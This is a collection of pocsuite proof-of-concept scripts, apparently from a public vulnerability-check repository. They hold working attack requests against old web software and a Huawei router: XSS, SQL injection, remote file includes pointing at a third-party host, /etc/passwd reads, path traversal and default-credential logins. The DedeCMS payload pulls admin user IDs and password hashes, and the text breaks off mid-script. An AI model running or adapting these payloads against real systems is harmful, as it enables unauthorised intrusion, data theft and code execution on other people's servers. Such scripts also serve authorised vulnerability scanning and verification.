    author = 'fenghh'
    vulDate = '2010-05-18'
    createDate = '2015-10-17'
    updateDate = '2015-10-17'
    references = ['https://www.exploit-db.com/exploits/33925/']
    name = "ecoCMS 18.4.2010 - 'admin.php' Cross-Site Scripting Vulnerability"
    appPowerLink = 'http://www.ecocms.com/'
    appName = 'ecoCMS'
    appVersion = '18.4.2010'
    vulType = 'XSS'
    desc = '''
    ecoCMS的admin.php中存在跨站脚本漏洞。远程攻击者可借助p参数注入任意web脚本或者HTML。
    '''
    # the sample sites for examine
    samples = ['']

    def _verify(self):
        probe = "/admin.php?p=1%22%3E%3Cscript%3Ealert%28/SebugTest/%29%3C/script%3E"
        target = urljoin(self.url, probe)
        return self.parse_verify(req.get(target, timeout=5))

    def parse_verify(self, res):
        """Succeed when the unescaped alert() call is reflected in the body."""
        output = Output(self)
        reflected = '>alert(/SebugTest/)' in res.content
        if not reflected:
            output.fail('Internet Nothing returned')
            return output
        output.success({'VerifyInfo': {'URL': self.url}})
        return output

    def _attack(self):
        # No separate exploit; attack mode re-runs verification.
        return self._verify()
46 |
47 | register(TestPOC)
--------------------------------------------------------------------------------
/dede_search.php_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | #!coding: utf-8
3 | import re
4 |
5 | from pocsuite.net import req
6 | from pocsuite.poc import POCBase,Output
7 | from pocsuite.utils import register
8 |
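class Fuckdede(POCBase):
    """pocsuite POC for the DedeCMS 5.7 ``plus/search.php`` SQL injection
    (``typeArr[...]`` key injection; see ``desc``).

    Fix over the original: the request path was built as
    ``self.url + "plus/search.php..."`` with no separator, so any ``self.url``
    without a trailing slash produced ``...complus/search.php``; the join is
    now slash-safe.
    Two caveats for operators. The success test only looks for the generic
    ``DedeCMS Error Warning!`` banner, which any malformed query can trigger,
    so expect false positives. And the payload used for *verification*
    already selects ``userid``/``pwd`` from the admin table - it is an
    extraction query, not a harmless probe - so run it only with
    authorisation.
    """
    vulID = '4'
    version = '1'
    author = ['fengxuan']
    vulDate = '2016-2-4'
    createDate = '2016-2-4'
    updateDate = '2016-2-4'
    references = ['http://www.evalshell.com', 'http://zone.wooyun.org/content/2414']
    name = 'dedecms plus/search.php 注入漏洞利用EXP'
    appPowerLink = 'http://www.dedecms.cn/'
    appName = 'dedecms'
    appVersion = '5.7'
    vulType = 'SQL Injection'
    desc = '''
    开发人员在修补漏洞的时候只修复了少数的变量而遗漏了其他变量,使其他变量直接
    带入了SQL语句中,可以通过\字符来转义掉一个单引号,逃逸单引号,产生SQL注入。
    此注入为报错注入,可以通过UpdateXML函数进行注入。
    '''
    samples = ['']

    def _verify(self):
        result = {}
        path = ("plus/search.php?keyword=as&typeArr[111%3D@%60\%27%60)+UnIon+seleCt+"
                "1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,"
                "pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+%60%23@__admin%60%23@%60\%27%60+]=a")
        # Slash-safe join: works whether or not self.url ends with '/'.
        target = self.url.rstrip('/') + '/' + path
        # timeout added so a silent host cannot stall the scan.
        content = req.get(target, timeout=10).content
        if 'DedeCMS Error Warning!' in content:
            result = {'VerifyInfo': {'URL': self.url}}
        return self.parse_result(result)

    def _attack(self):
        # Verification already runs the extraction payload.
        return self._verify()

    def parse_result(self, result):
        """Wrap ``result`` in an Output: success when non-empty, else fail."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail("Internet Nothing returned")
        return output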
50 |
51 | register(Fuckdede)
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
--------------------------------------------------------------------------------
/Limbo CMS Module event 1.0 - Remote File Include Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | import re
5 | from pocsuite.net import req
6 | from pocsuite.poc import Output, POCBase
7 | from pocsuite.utils import register
8 |
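class Limbo_CMS_Module_event_Remote_File_Include(POCBase):
    """pocsuite POC for SSV-64366: remote file include in the Limbo CMS event
    module through ``lm_absolute_path`` of ``eventcal/mod_eventcal.php``.

    The target is asked to include a PHP file hosted on tool.scanv.com and
    the response is searched for the fixed marker that file is expected to
    print. The check depends on that third-party host being up and
    trustworthy; host the verify file yourself for real engagements.
    NOTE(review): ``name`` says version 1.0 while ``appVersion`` says 1.1 -
    confirm against the ssvid-64366 entry.
    """
    vulID = '64366'
    version = '1'
    vulDate = '2006-12-27'
    author = ' '
    createDate = '2015-12-19'
    updateDate = ' '
    references = ['http://www.sebug.net/vuldb/ssvid-64366']
    name = 'Limbo CMS Module event 1.0 - Remote File Include Vulnerability'
    appPowerLink = 'http://www.limbo-tr.com/images/downloads/event.zip'
    appName = 'Limbo CMS Module event'
    appVersion = '1.1'
    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']

    def _attack(self):
        # No separate exploit; attack mode re-runs verification.
        return self._verify()

    def _verify(self):
        result = {}
        vul_url = '%s/eventcal/mod_eventcal.php?lm_absolute_path=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
        # timeout added so a silent host cannot stall the scan.
        response = req.get(vul_url, timeout=10).content

        if 'd4d7a6b8b3ed8ed86db2ef2cd728d8ec' in response:
            result['VerifyInfo'] = {'URL': self.url}

        return self.parse_attack(result)

    def parse_attack(self, result):
        """Wrap ``result`` in an Output: success when non-empty, else 'failed'."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('failed')
        return output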
52 |
53 | register(Limbo_CMS_Module_event_Remote_File_Include)
--------------------------------------------------------------------------------
/724CMS _= 4.01 Enterprise (index.php ID) SQL Injection Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | from pocsuite.net import req
5 | from pocsuite.poc import POCBase, Output
6 | from pocsuite.utils import register
7 |
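class TestPOC(POCBase):
    """pocsuite POC for SSV-65307 / EDB-5400: UNION-based SQL injection in the
    ``ID`` parameter of 724CMS <= 4.01 ``index.php``.

    The payload puts ``md5(666)`` in the second UNION column; success means
    that hash was rendered in the page. The payload contains raw spaces and
    relies on the HTTP client to percent-encode them.
    """
    vulID = 'SSV-65307'  # vul ID
    version = '1'
    author = ['hh']
    vulDate = '2008-04-07'
    createDate = '2015-10-16'
    updateDate = '2015-10-16'
    references = ['https://www.exploit-db.com/exploits/5400/']
    name = '724CMS <= 4.01 Enterprise (index.php ID) SQL Injection Vulnerability'
    appPowerLink = 'http://724cms.com/'
    appName = '724cms'
    appVersion = '<= 4.01'
    vulType = 'SQL Injection'
    desc = '''
    724Networks 724CMS 4.01及其早期版本的index.php存在SQL注入漏洞。远程攻击者通过ID参数来执行任意SQL命令。
    '''
    # the sample sites for examine
    samples = ['']

    def _verify(self):
        result = {}
        payload = "/index.php?ID=1 UNION SELECT 1,md5(666),3,4,5,6,7,8--"
        verify_url = self.url + payload
        # timeout added so a silent host cannot stall the scan.
        content = req.get(verify_url, timeout=10).content
        if 'fae0b27c451c728867a567e8c1bb4e53' in content:
            # The reported URL includes the payload, unlike most sibling POCs.
            result['VerifyInfo'] = {'URL': verify_url}
        return self.parse_verify(result)

    def _attack(self):
        # No extraction implemented; attack mode re-runs verification.
        return self._verify()

    def parse_verify(self, result):
        """Wrap ``result`` in an Output: success when non-empty, else fail."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet Nothing returned')
        return output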
47 |
48 | register(TestPOC)
--------------------------------------------------------------------------------
/Mambo cropimage Component _= 1.0 - Remote File Include Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | import re
5 | from pocsuite.net import req
6 | from pocsuite.poc import Output, POCBase
7 | from pocsuite.utils import register
8 |
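class Mambo_cropimage_Component_Remote_File_Include(POCBase):
    """pocsuite POC for SSV-63857: remote file include in the Mambo cropimage
    component through ``cropimagedir`` of ``admin.cropcanvas.php``.

    The target is asked to include a PHP file hosted on tool.scanv.com and
    the response is searched for the fixed marker that file is expected to
    print. The check depends on that third-party host being up and
    trustworthy - a hijacked host would have the target run arbitrary code -
    so host the verify file yourself for real engagements.
    """
    vulID = '63857'
    version = '1'
    vulDate = '2006-08-19'
    author = ' '
    createDate = '2015-12-16'
    updateDate = ' '
    references = ['http://www.sebug.net/vuldb/ssvid-63857']
    name = 'Mambo cropimage Component <= 1.0 - Remote File Include Vulnerability'
    appPowerLink = ''
    appName = 'Mambo cropimage Component'
    appVersion = '<= 1.0'
    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']

    def _attack(self):
        # No separate exploit; attack mode re-runs verification.
        return self._verify()

    def _verify(self):
        result = {}
        vul_url = ('%s/administrator/components/com_cropimage/admin.cropcanvas.php'
                   '?cropimagedir=http://tool.scanv.com/wsl/php_verify.txt?' % self.url)
        # timeout added so a silent host cannot stall the scan.
        response = req.get(vul_url, timeout=10).content

        if 'd4d7a6b8b3ed8ed86db2ef2cd728d8ec' in response:
            result['VerifyInfo'] = {'URL': self.url}

        return self.parse_attack(result)

    def parse_attack(self, result):
        """Wrap ``result`` in an Output: success when non-empty, else 'failed'."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('failed')
        return output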
52 |
53 | register(Mambo_cropimage_Component_Remote_File_Include)
--------------------------------------------------------------------------------
/Joomla Kochsuite Component _= 0.9.4 - Remote File Include Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | import re
5 | from pocsuite.net import req
6 | from pocsuite.poc import Output, POCBase
7 | from pocsuite.utils import register
8 |
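class Joomla_Kochsuite_Component_Remote_File_Include(POCBase):
    """pocsuite POC for SSV-63855: remote file include in the Joomla Kochsuite
    component through ``mosConfig_absolute_path`` of ``config.kochsuite.php``.

    The target is asked to include a PHP file hosted on tool.scanv.com and
    the response is searched for the fixed marker that file is expected to
    print. The check depends on that third-party host being up and
    trustworthy; host the verify file yourself for real engagements.
    """
    vulID = '63855'
    version = '1'
    vulDate = '2006-10-17'
    author = ' '
    createDate = '2015-12-16'
    updateDate = ' '
    references = ['http://www.sebug.net/vuldb/ssvid-63855']
    name = 'Joomla Kochsuite Component <= 0.9.4 - Remote File Include Vulnerability'
    appPowerLink = ''
    appName = 'Joomla Kochsuite Component'
    appVersion = '<= 0.9.4'
    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']

    def _attack(self):
        # No separate exploit; attack mode re-runs verification.
        return self._verify()

    def _verify(self):
        result = {}
        vul_url = ('%s/components/com_kochsuite/config.kochsuite.php'
                   '?mosConfig_absolute_path=http://tool.scanv.com/wsl/php_verify.txt?' % self.url)
        # timeout added so a silent host cannot stall the scan.
        response = req.get(vul_url, timeout=10).content

        if 'd4d7a6b8b3ed8ed86db2ef2cd728d8ec' in response:
            result['VerifyInfo'] = {'URL': self.url}

        return self.parse_attack(result)

    def parse_attack(self, result):
        """Wrap ``result`` in an Output: success when non-empty, else 'failed'."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('failed')
        return output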
52 |
53 | register(Joomla_Kochsuite_Component_Remote_File_Include)
--------------------------------------------------------------------------------
/DirPHP 1.0 - LFI Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding:utf-8 -*-
3 |
4 |
5 |
6 | from pocsuite.net import req
7 |
8 | from pocsuite.poc import Output, POCBase
9 |
10 | from pocsuite.utils import register
11 |
12 |
13 |
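class TestPOC(POCBase):
    """pocsuite POC for SSV-87159: local file inclusion in DirPHP 1.0
    ``index.php`` through the ``phpfile`` parameter (absolute path, no
    traversal needed).

    Verification requests ``/etc/passwd`` and looks for evidence of it in
    the response. The original only accepted ``bin/bash``, which misses
    hosts where no account uses bash (BusyBox, Alpine, hardened images); the
    root entry ``root:<x>:0:0:`` is now accepted too, and the old test is
    kept so every previously positive target still matches.
    ``vulDate``/``createDate`` are epoch timestamps, unlike the ISO dates
    used by sibling POCs.
    """
    vulID = '87159'
    version = '1'
    vulDate = '1406390400'
    createDate = '1442937600'
    references = ['http://www.sebug.net/vuldb/ssvid-87159']
    name = 'DirPHP LFI Vulnerability'
    appPowerLink = 'http://sourceforge.net/projects/dirphp/'
    appName = 'DirPHP'
    appVersion = '1.0'
    vulType = 'Local File Inclusion'
    desc = '''DirPHP index.php文件在处理传入的参数时存在缺陷,导致产生本地文件包含漏洞。'''
    samples = ['']

    def _attack(self):
        # No separate exploit; attack mode re-runs verification.
        return self._verify()

    def _verify(self, verify=True):
        import re  # function-scope: this file does not import re at the top

        result = {}
        vul_url = '%s/index.php?phpfile=/etc/passwd' % self.url
        response = req.get(vul_url, timeout=10).content

        # Either the original bash marker or the root passwd entry proves the
        # file was included.
        passwd_leaked = ('bin/bash' in response
                         or re.search(r'root:[^:\n]*:0:0:', response) is not None)
        if passwd_leaked:
            result['VerifyInfo'] = {'URL': self.url}

        return self.parse_attack(result)

    def parse_attack(self, result):
        """Wrap ``result`` in an Output: success when non-empty, else 'failed'."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('failed')
        return output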
87 |
88 | register(TestPOC)
--------------------------------------------------------------------------------
/Huawei E5331 API验证绕过漏洞.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 |
7 |
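class Huawei_E5331_Unauthorized_access(POCBase):
    """pocsuite POC for SSV-61930: unauthenticated access to the WLAN
    security-settings API of a Huawei mobile router.

    Only ``/api/wlan/security-settings`` is requested, with no credentials.
    NOTE(review): the original body had two defects. It used ``re`` without
    importing it (NameError on every run), and its check was
    ``re.search('', response)`` twice - an empty pattern matches any
    response, including a 404 page, so every host scanned was reported
    vulnerable. The strings that would prove the endpoint returned the WLAN
    settings are not recorded in this file, so the check now fails closed:
    it succeeds only when ``INDICATORS`` is non-empty and every pattern in it
    matches. Fill ``INDICATORS`` from a known-vulnerable device before use.
    Metadata to confirm: ``name`` says E5331 while ``appName`` says E355.
    """
    # Regexes that must all match the response body. Empty => never succeed.
    INDICATORS = ()

    vulID = '61930'  # ssvid
    version = '1.0'
    author = ['anonymous']
    vulDate = '2013-12-06'
    createDate = '2015-11-13'
    updateDate = '2015-11-13'
    references = ['http://www.sebug.net/vuldb/ssvid-61930']
    name = 'Huawei E5331 API验证绕过漏洞'
    appPowerLink = 'http://www.huawei.com'
    appName = 'Huawei E355'
    appVersion = 'Software version 21.344.11.00.414'
    vulType = 'Unauthorized access'
    desc = '''
    All discovered vulnerabilities can be exploited without authentication and therefore pose a high security risk.
    '''
    samples = ['']

    def _attack(self):
        # Attack mode is identical to verification.
        return self._verify()

    def _verify(self, verify=True):
        import re  # function-scope: this file never imported re at the top

        result = {}
        vul_url = '%s/api/wlan/security-settings' % (self.url)
        # timeout added so an unresponsive device cannot stall the scan.
        response = req.get(vul_url, timeout=10).content

        indicators = self.INDICATORS
        if indicators and all(re.search(p, response) for p in indicators):
            result['VerifyInfo'] = {'URL': vul_url}

        return self.parse_attack(result)

    def parse_attack(self, result):
        """Wrap ``result`` in an Output: success when non-empty, else 'failed'."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('failed')
        return output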
49 |
50 |
51 | register(Huawei_E5331_Unauthorized_access)
--------------------------------------------------------------------------------
/JASmine _= 0.0.2 (index.php) Remote File Include Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | import re
5 | from pocsuite.net import req
6 | from pocsuite.poc import Output, POCBase
7 | from pocsuite.utils import register
8 |
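class JASmine_News_Remote_File_Include(POCBase):
    """JASmine <= 0.0.2 remote file include through ``index.php?section=`` (SSV-64073).

    The check asks the target to include a probe file hosted on a third-party
    server and looks for that probe's fixed output in the response.
    """
    vulID = '64073'
    version = '1'
    vulDate = '2006-10-17'
    author = ' '
    createDate = '2015-12-16'
    updateDate = ' '
    references = ['http://www.sebug.net/vuldb/ssvid-64073']
    name = 'JASmine <= 0.0.2 (index.php) Remote File Include Vulnerability'
    appPowerLink = 'http://www.sourcefiles.org/Utilities/Printer/Jasmine-Web-0.0.2.tar.bz2'
    appName = 'JASmine'
    appVersion = '<= 0.0.2'
    vulType = 'Remote File Inclusion'
    # The original desc was copy-pasted from the phpBB PlusXL PoC and described
    # a different product; it now matches ``name`` and the parameter used below.
    desc = 'JASmine <= 0.0.2 (index.php) Remote File Include Vulnerability via the section parameter'
    samples = ['']

    def _attack(self):
        """Attack mode is the same request as verify mode."""
        return self._verify()

    def _verify(self):
        """Include a remote probe through ``section=`` and look for its output.

        SECURITY NOTE: the include target is a host the PoC author does not
        control (tool.scanv.com).  Whatever that host serves is executed as PHP
        on the *target*, so if it is ever compromised or its domain expires,
        running this check hands code execution on the target to a third party.
        The trailing ``?`` presumably turns whatever the application appends to
        the include path into a query string on the remote URL.
        """
        result = {}
        vul_url = '%s/index.php?section=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
        response = req.get(vul_url).content

        # Fixed token printed by the remote probe file when it is executed.
        if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url

        return self.parse_attack(result)

    def parse_attack(self, result):
        """Turn ``result`` into an ``Output``: non-empty dict -> success."""
        output = Output(self)

        if result:
            output.success(result)
        else:
            output.fail('failed')

        return output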
52 |
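# Register the class actually defined in this file.  The original referenced
# ``JASmine_PlusXL_News_Remote_File_Include`` (a leftover from the phpBB PlusXL
# PoC it was copied from), a name that does not exist here, so loading the
# module raised NameError and the PoC never ran.
register(JASmine_News_Remote_File_Include)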
--------------------------------------------------------------------------------
/eWebEditor 弱密码漏洞.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 |
7 |
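class TestPOC(POCBase):
    """eWebEditor default-credential check (SSV-62352): tries admin/admin."""
    vulID = '62352'  # ssvid
    version = '1.0'
    author = ['']
    vulDate = '2013-04-23'
    createDate = '2016-03-07'
    updateDate = '2016-03-07'
    references = ['http://www.seebug.org/vuldb/ssvid-62352']
    name = 'eWebEditor 弱密码漏洞'
    appPowerLink = 'http://www.ewebeditor.net/'
    appName = 'eWebEditor'
    appVersion = 'ALL'
    vulType = 'Weak Password'
    desc = '''
    ewebeditor默认情况下, 可用弱口令登录,从而导致攻击者可据此信息进行后续攻击。
    '''
    samples = ['']

    def _attack(self):
        """Attack mode is the same login attempt as verify mode."""
        return self._verify()

    def _verify(self):
        """Try the default admin/admin login at each known admin-page path.

        Stops at the first path that lands in the admin area: one successful
        default-credential login is proof enough, and the original kept sending
        login attempts to the remaining paths after a hit (extra log noise on
        the target).  Credentials travel in the GET query string because that
        is how this login page accepts them.

        Returns:
            ``Output`` from :meth:`parse_output`.
        """
        result = {}
        # NOTE(review): the last entry (/admin/login.php) can only match if it
        # also redirects to admin_default.asp, which the check below requires;
        # it is most likely dead weight.
        paths = ["/admin_login.asp", "/admin/ewebeditor/admin_login.asp",
                 "/edit/admin_login.asp",
                 "/ewebeditor/admin_login.asp", "/admin/login.php"]
        for path in paths:
            target = "%s%s?action=login&usr=admin&pwd=admin" % (self.url, path)
            res = req.get(target)
            # A successful login ends up on admin_default.asp (res.url is the
            # final URL, presumably after a redirect) and the page carries
            # eWebEditor's own markup.
            if ("admin_default.asp" in res.url
                    and "href='admin_login.asp'" in res.content
                    and "eWebEditor" in res.content):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = res.url
                break

        return self.parse_output(result)

    def parse_output(self, result):
        """Turn ``result`` into an ``Output``: non-empty dict -> success."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output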
49 |
50 |
51 | register(TestPOC)
52 |
--------------------------------------------------------------------------------
/GlassFish 任意文件读取漏洞.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | import re
5 |
6 | from pocsuite.net import req
7 | from pocsuite.poc import POCBase, Output
8 | from pocsuite.utils import register
9 |
10 |
class TestPOC(POCBase):
    """GlassFish <= 4.1.0 arbitrary file read (SSV-90437 / TWSL2015-016).

    Requests ``META-INF/MANIFEST.MF`` through a path-traversal sequence and
    reports a hit when the response looks like a JAR manifest.
    """
    vulID = '90437'
    version = '1'
    author = 'RickGray'
    vulDate = '2016-01-14'
    createDate = '2016-01-14'
    updateDate = '2016-01-14'
    references = [
        'https://www.sebug.net/vuldb/ssvid-90437',
        'http://www.oracle.com/us/products/middleware/cloud-app-foundation/glassfish-server/overview/index.html',
        'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904'
    ]
    name = 'GlassFish <= 4.1.0 任意文件读取漏洞 POC'
    appPowerLink = 'https://glassfish.java.net'
    appName = 'GlassFish'
    appVersion = '<= 4.1.0'
    vulType = 'Arbitrary File Read'
    desc = '''

    '''

    samples = []

    # ``%c0%ae`` is an overlong two-byte UTF-8 encoding of '.'; the traversal
    # relies on the server decoding it leniently after its own '..' filtering.
    _TRAVERSAL_PATH = '/theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF'

    def _verify(self):
        """Fetch the manifest via the traversal path and classify the reply."""
        reply = req.get(self.url + self._TRAVERSAL_PATH)
        return self.parse_verify(reply)

    def _attack(self):
        """Attack mode is the same read as verify mode."""
        return self._verify()

    def parse_verify(self, response):
        """Report success when the body looks like a manifest.

        The second alternative of the pattern contains misspellings; it is kept
        verbatim from the original.  Only the response body is inspected, not
        the status code.
        """
        output = Output(self)
        looks_like_manifest = re.search(
            r'Manifest-Version|Mainfest.*Versioin', response.content)

        if not looks_like_manifest:
            output.fail('Failed to read file or not be vulnerable')
            return output

        output.success({'VerifyInfo': {'URL': response.url}})
        return output
55 |
56 |
57 | register(TestPOC)
58 |
--------------------------------------------------------------------------------
/_160615_GlassFish_410_file_read.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | import re
5 |
6 | from pocsuite.net import req
7 | from pocsuite.poc import POCBase, Output
8 | from pocsuite.utils import register
9 |
10 |
class TestPOC(POCBase):
    """GlassFish <= 4.1.0 arbitrary file read (SSV-90437 / TWSL2015-016).

    Requests ``META-INF/MANIFEST.MF`` through a path-traversal sequence and
    reports a hit when the response looks like a JAR manifest.
    """
    vulID = '90437'
    version = '1'
    author = 'RickGray'
    vulDate = '2016-01-14'
    createDate = '2016-01-14'
    updateDate = '2016-01-14'
    references = [
        'https://www.sebug.net/vuldb/ssvid-90437',
        'http://www.oracle.com/us/products/middleware/cloud-app-foundation/glassfish-server/overview/index.html',
        'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904'
    ]
    name = 'GlassFish <= 4.1.0 任意文件读取漏洞 POC'
    appPowerLink = 'https://glassfish.java.net'
    appName = 'GlassFish'
    appVersion = '<= 4.1.0'
    vulType = 'Arbitrary File Read'
    desc = '''

    '''

    samples = []

    # ``%c0%ae`` is an overlong two-byte UTF-8 encoding of '.'; the traversal
    # relies on the server decoding it leniently after its own '..' filtering.
    _TRAVERSAL_PATH = '/theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF'

    def _verify(self):
        """Fetch the manifest via the traversal path and classify the reply."""
        reply = req.get(self.url + self._TRAVERSAL_PATH)
        return self.parse_verify(reply)

    def _attack(self):
        """Attack mode is the same read as verify mode."""
        return self._verify()

    def parse_verify(self, response):
        """Report success when the body looks like a manifest.

        The second alternative of the pattern contains misspellings; it is kept
        verbatim from the original.  Only the response body is inspected, not
        the status code.
        """
        output = Output(self)
        looks_like_manifest = re.search(
            r'Manifest-Version|Mainfest.*Versioin', response.content)

        if not looks_like_manifest:
            output.fail('Failed to read file or not be vulnerable')
            return output

        output.success({'VerifyInfo': {'URL': response.url}})
        return output
55 |
56 |
57 | register(TestPOC)
58 |
--------------------------------------------------------------------------------
/Dream4 Koobi CMS 4.2.3 Index.PHP Cross-Site Scripting Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | from pocsuite.net import req
5 | from pocsuite.poc import POCBase, Output
6 | from pocsuite.utils import register
7 | from urlparse import urljoin
8 |
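class TestPOC(POCBase):
    """Dream4 Koobi CMS 4.2.3 reflected XSS in ``index.php?area=`` (SSV-78938)."""
    vulID = 'SSV-78938'  # vul ID
    version = '1'
    author = 'hzr'
    vulDate = '2005-03-24'
    createDate = '2015-10-26'
    updateDate = '2015-10-26'
    references = ['https://www.exploit-db.com/exploits/25272/', 'http://www.securityfocus.com/bid/12895/info']
    name = "Dream4 Koobi CMS 4.2.3 Index.PHP Cross-Site Scripting Vulnerability"
    appPowerLink = 'http://www.dream4.de/index.htm'
    appName = 'Dream4 Koobi CMS'
    appVersion = '4.2.3'
    vulType = 'XSS'
    desc = '''
    Dream4 Koobi CMS 4.2.3的index.php中存在跨站脚本攻击(XSS)漏洞,
    远程攻击者可以通过area参数注入任意Web脚本或HTML。
    '''
    # the sample sites for examine
    samples = ['']

    # Substring that must be reflected unescaped for the XSS to count.
    # NOTE(review): the injected part of the payload and this marker were both
    # stripped to '' in this copy of the PoC.  The original tested
    # ``'' in res.content``, which is always true, so every host that answered
    # was flagged.  An empty marker is now treated as "cannot verify" until the
    # real payload/marker pair is restored.
    _XSS_MARKER = ''

    def _verify(self):
        """Request index.php with the (currently empty) XSS payload in ``area``."""
        payload = '/index.php?area='
        res = req.get(urljoin(self.url, payload), timeout=10)
        return self.parse_verify(res, payload, 'xss')

    def parse_verify(self, res, payload, type):
        """Report success only when a non-empty marker is reflected.

        Args:
            res: HTTP response for ``payload``.
            payload: path+query that was requested; echoed in the result.
            type: check kind; only 'xss' is handled.
        """
        output = Output(self)
        result = {}
        marker = self._XSS_MARKER
        if type == 'xss' and marker and marker in res.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = urljoin(self.url, payload)
            output.success(result)
        else:
            output.fail('Internet Nothing returned')
        return output

    def _attack(self):
        """Attack mode is the same request as verify mode."""
        return self._verify()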
47 |
48 | register(TestPOC)
--------------------------------------------------------------------------------
/_130423_eWebEditor_all_weak_password.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 |
7 |
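class TestPOC(POCBase):
    """eWebEditor default-credential check (SSV-62352): tries admin/admin."""
    vulID = '62352'  # ssvid
    version = '1.0'
    author = ['']
    vulDate = '2013-04-23'
    createDate = '2016-03-07'
    updateDate = '2016-03-07'
    references = ['http://www.seebug.org/vuldb/ssvid-62352']
    name = 'eWebEditor 弱密码漏洞'
    appPowerLink = 'http://www.ewebeditor.net/'
    appName = 'eWebEditor'
    appVersion = 'ALL'
    vulType = 'Weak Password'
    desc = '''
    ewebeditor默认情况下, 可用弱口令登录,从而导致攻击者可据此信息进行后续攻击。
    '''
    samples = ['']

    def _attack(self):
        """Attack mode is the same login attempt as verify mode."""
        return self._verify()

    def _verify(self):
        """Try the default admin/admin login at each known admin-page path.

        Stops at the first path that lands in the admin area: one successful
        default-credential login is proof enough, and the original kept sending
        login attempts to the remaining paths after a hit (extra log noise on
        the target).  Credentials travel in the GET query string because that
        is how this login page accepts them.

        Returns:
            ``Output`` from :meth:`parse_output`.
        """
        result = {}
        # NOTE(review): the last entry (/admin/login.php) can only match if it
        # also redirects to admin_default.asp, which the check below requires;
        # it is most likely dead weight.
        paths = ["/admin_login.asp", "/admin/ewebeditor/admin_login.asp",
                 "/edit/admin_login.asp",
                 "/ewebeditor/admin_login.asp", "/admin/login.php"]
        for path in paths:
            target = "%s%s?action=login&usr=admin&pwd=admin" % (self.url, path)
            res = req.get(target)
            # A successful login ends up on admin_default.asp (res.url is the
            # final URL, presumably after a redirect) and the page carries
            # eWebEditor's own markup.
            if ("admin_default.asp" in res.url
                    and "href='admin_login.asp'" in res.content
                    and "eWebEditor" in res.content):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = res.url
                break
        return self.parse_output(result)

    def parse_output(self, result):
        """Turn ``result`` into an ``Output``: non-empty dict -> success."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output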
50 |
51 |
52 | register(TestPOC)
53 |
--------------------------------------------------------------------------------
/CMS phpshop 2.0 - SQL Injection Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | from pocsuite.net import req
5 | from pocsuite.poc import POCBase, Output
6 | from pocsuite.utils import register
7 | import re
8 |
class TestPOC(POCBase):
    """phpshop 2.0 union-based SQL injection in ``module_id`` (SSV-77845).

    The injected ``CONCAT`` of three hex literals decodes to the fixed token
    ``qbxvq`` + ``PfNhXNLXCR`` + ``qjqqq``; seeing that token in the page means
    the injected column was rendered.
    """
    vulID = 'SSV-77845'  # vul ID
    version = '1'
    author = ['hh']
    vulDate = '2013-01-14'
    createDate = '2015-10-16'
    updateDate = '2015-10-16'
    references = ['https://www.exploit-db.com/exploits/24108/']
    name = 'CMS phpshop 2.0 - SQL Injection Vulnerability'
    appPowerLink = 'http://code.google.com/p/phpshop/downloads/list'
    appName = 'phpshop'
    appVersion = '2.0'
    vulType = 'SQL Injection'
    desc = '''
    ?page=admin/function_list&module_id=11 id变量未正确过滤,导致SQL注入漏洞
    '''
    # the sample sites for examine
    samples = ['']

    # Hex 0x7162787671 / 0x50664e68584e4c584352 / 0x716a717171 concatenated.
    _TOKEN = 'qbxvqPfNhXNLXCRqjqqq'

    def _verify(self):
